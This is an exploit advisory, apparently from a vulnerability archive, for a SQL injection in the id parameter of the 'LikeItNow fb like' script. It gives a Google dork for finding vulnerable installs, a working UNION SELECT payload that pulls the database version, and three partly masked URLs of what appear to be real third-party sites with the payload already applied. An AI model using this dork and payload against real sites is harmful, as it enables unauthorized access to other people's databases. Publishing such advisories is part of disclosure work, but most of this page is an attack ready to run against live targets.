LikeItNow fb like (like.php, id parameter) SQL Injection

2012.11.17
Credit: xStarCode
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: LikeItNow fb like (like.php, id parameter) SQL Injection # Date: 17.11.2012 # Author: xStarCode # Exploit Author: xStarCode # Version: 1.0 # Category: webapps # Google Dork: intitle:"LikeItNow - What do you like?" # Tested on: Linux # Demo site: http://cXXmaidea.com/like/like.php?id=-1+UNION+SELECT+1,version(),3-- http://wwwXXercs.net/fb/like.php?id=-1+UNION+SELECT+1,version(),3-- http://maXXio.comule.com/like.php?id=-1+UNION+SELECT+1,version(),3-- # Vulnerable Parameters: id #Exploit: www.example.com/like.php?id=[SQL Injection] # Author Mail: xstarcode@vpn.st Author Website: www.xstarcode.wordpress.com Xo xStarCode #

References:

http://www.xstarcode.wordpress.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top